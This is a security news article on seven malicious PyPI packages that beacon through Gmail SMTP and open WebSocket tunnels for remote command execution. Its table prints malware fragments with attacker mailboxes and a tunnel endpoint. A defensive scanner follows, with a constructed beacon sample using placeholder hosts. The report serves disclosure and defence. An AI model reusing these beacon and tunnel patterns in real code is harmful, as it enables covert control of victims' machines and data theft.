A major supply chain security incident has rocked the Python open-source community as researchers at Socket’s Threat Research Team uncovered seven interconnected malicious packages published on the Python Package Index (PyPI).
These packages, Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb, were designed to abuse Gmail's SMTP service as a beaconing channel, then establish covert command-and-control tunnels that let attackers execute arbitrary commands on compromised machines.
Sophisticated Abuse of Gmail’s SMTP
What sets these packages apart from the typical malware found on PyPI is their reliance on Gmail’s Simple Mail Transfer Protocol (SMTP) for communication.
This allows the traffic generated by the malware to blend in as legitimate email traffic, sidestepping most firewall and endpoint detection systems that inherently trust Gmail’s infrastructure.
Below is a table summarizing each of the seven malicious Python packages uncovered and the key code behavior identified in the investigation: the Gmail SMTP account each package logs in with, the mailbox that receives the beacon, and, for cfc-bsb, the tunnel endpoint. Redacted credentials are marked as such.

| Package Name | Key Malicious Code/Technique |
|---|---|
| Coffin-Codes-Pro | srv = smtplib.SMTP_SSL("smtp.gmail.com", 465); srv.login("sphacoffin@gmail.com", "[redacted]"); srv.sendmail("sphacoffin@gmail.com", "blockchain.bitcoins2020@gmail.com", "SHIT INCOMIN") |
| Coffin-Codes-NET2 | srv.login("hackingbsb@gmail.com", "[redacted]"); srv.sendmail("sphacoffin@gmail.com", "blockchain.bitcoins2020@gmail.com", "SHIT INCOMIN") |
| Coffin-Codes-NET | srv.login("btcchain2@gmail.com", "[redacted]"); srv.sendmail("sphacoffin@gmail.com", "blockchain.bitcoins2020@gmail.com", "SHIT INCOMIN") |
| Coffin-Codes-2022 | srv.login("sphacoffin@gmail.com", "[redacted]"); srv.sendmail("sphacoffin@gmail.com", "blockchain.bitcoins2020@gmail.com", "SHIT INCOMIN") |
| Coffin2022 | srv.login("sphacoffin@gmail.com", "[redacted]"); srv.sendmail("sphacoffin@gmail.com", "blockchain.bitcoins2020@gmail.com", "SHIT INCOMIN") |
| Coffin-Grave | srv.login("sphacoffin@gmail.com", "[redacted]"); srv.sendmail("sphacoffin@gmail.com", "blockchain.bitcoins2020@gmail.com", "SHIT INCOMIN") |
| cfc-bsb | WebSocket tunneling to wss://open.jprq.live; no SMTP/email or credential exfiltration |
According to Socket's findings, upon installation the packages open SSL-encrypted connections to Gmail's SMTP servers using hardcoded credentials for attacker-controlled accounts (notably sphacoffin@gmail.com, among others).
An initial message is then sent to a second attacker mailbox, blockchain.bitcoins2020@gmail.com, confirming that the implant is active on the victim host.
The core functionality centers on setting up a clandestine tunnel. After the initial beacon, the malicious modules open a secure WebSocket channel to receive further instructions. The attacker can then leverage this tunnel to:
- Exfiltrate sensitive data
- Execute arbitrary shell commands or scripts
- Harvest credentials or access admin panels
- Transfer files in and out of victim networks
- Pivot further into internal networks
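The two install-time indicators described above, a hardcoded Gmail SMTP login followed by a beacon email, and an outbound WebSocket endpoint, can be caught by a simple static check before a package is installed. The following is an added, defender-side example written for this article, not code from Socket's report or from the packages themselves; the sample source it scans is constructed to match the described pattern, and the accounts and tunnel URL in it are placeholders.

```python
import ast

# Constructed sample in the shape of the install-time beacon described above
# (not the real package source); accounts and the tunnel endpoint are placeholders.
SAMPLE_SETUP = '''
import smtplib
srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
srv.login("attacker@example.com", "REDACTED-PASSWORD")
srv.sendmail("attacker@example.com", "dropbox@example.com", "SHIT INCOMIN")
ws = connect("wss://tunnel.example.invalid")
'''

MAIL_HOSTS = ("smtp.gmail.com",)  # extend with other webmail SMTP hosts as needed


def _string(node):
    """Return the literal value of a string constant node, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def scan_source(src):
    """Return (lineno, finding) pairs for SMTP-beacon and tunnel indicators in src."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        args = [_string(a) for a in node.args]
        if name in ("SMTP", "SMTP_SSL") and args and args[0] in MAIL_HOSTS:
            findings.append((node.lineno, f"outbound mail session to {args[0]}"))
        elif name == "login" and len(args) >= 2 and args[0] and args[1]:
            # Both username and password are string literals: hardcoded credentials.
            findings.append((node.lineno, f"hardcoded login for {args[0]}"))
        elif name == "sendmail" and args and args[0]:
            findings.append((node.lineno, f"sendmail() beacon from {args[0]}"))
        for value in args:
            if value and value.startswith(("ws://", "wss://")):
                findings.append((node.lineno, f"WebSocket tunnel endpoint {value}"))
    return findings


if __name__ == "__main__":
    for lineno, finding in scan_source(SAMPLE_SETUP):
        print(f"line {lineno}: {finding}")
```

Run it over a package's setup.py and __init__.py before installing; any hit on a package that has no legitimate reason to send mail or open a tunnel at import time is worth a manual look.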
Package Details and Timeline
Each package had slight variations:
- Coffin-Codes-Pro: Established the initial attack pattern, signaling the implant and forwarding tunnel information to the attacker.
- Coffin-Codes-NET2 & Coffin-Codes-NET: Employed new Gmail accounts and minor code changes, illustrating the attacker’s persistent efforts.
- Coffin-Codes-2022, Coffin2022, Coffin-Grave: Functionally mirrored the original package, with reused credentials and workflow across different PyPI entries.
- cfc-bsb: The oldest and least overtly malicious, dating to March 2021. While it lacked direct email exfiltration, it still provided tunnel forwarding and posed significant risk.
The only clues to the attacker’s identity are the handful of Gmail addresses used and the recurring Bitcoin and Solana-related references, suggesting possible ties to prior crypto-targeted attacks.
The packages have since been removed from PyPI, but their extended presence, dating as far back as 2021, underscores the difficulty of policing open-source repositories.
As open-source supply chain attacks become more stealthy and creative, awareness and vigilance must rise across the software development lifecycle.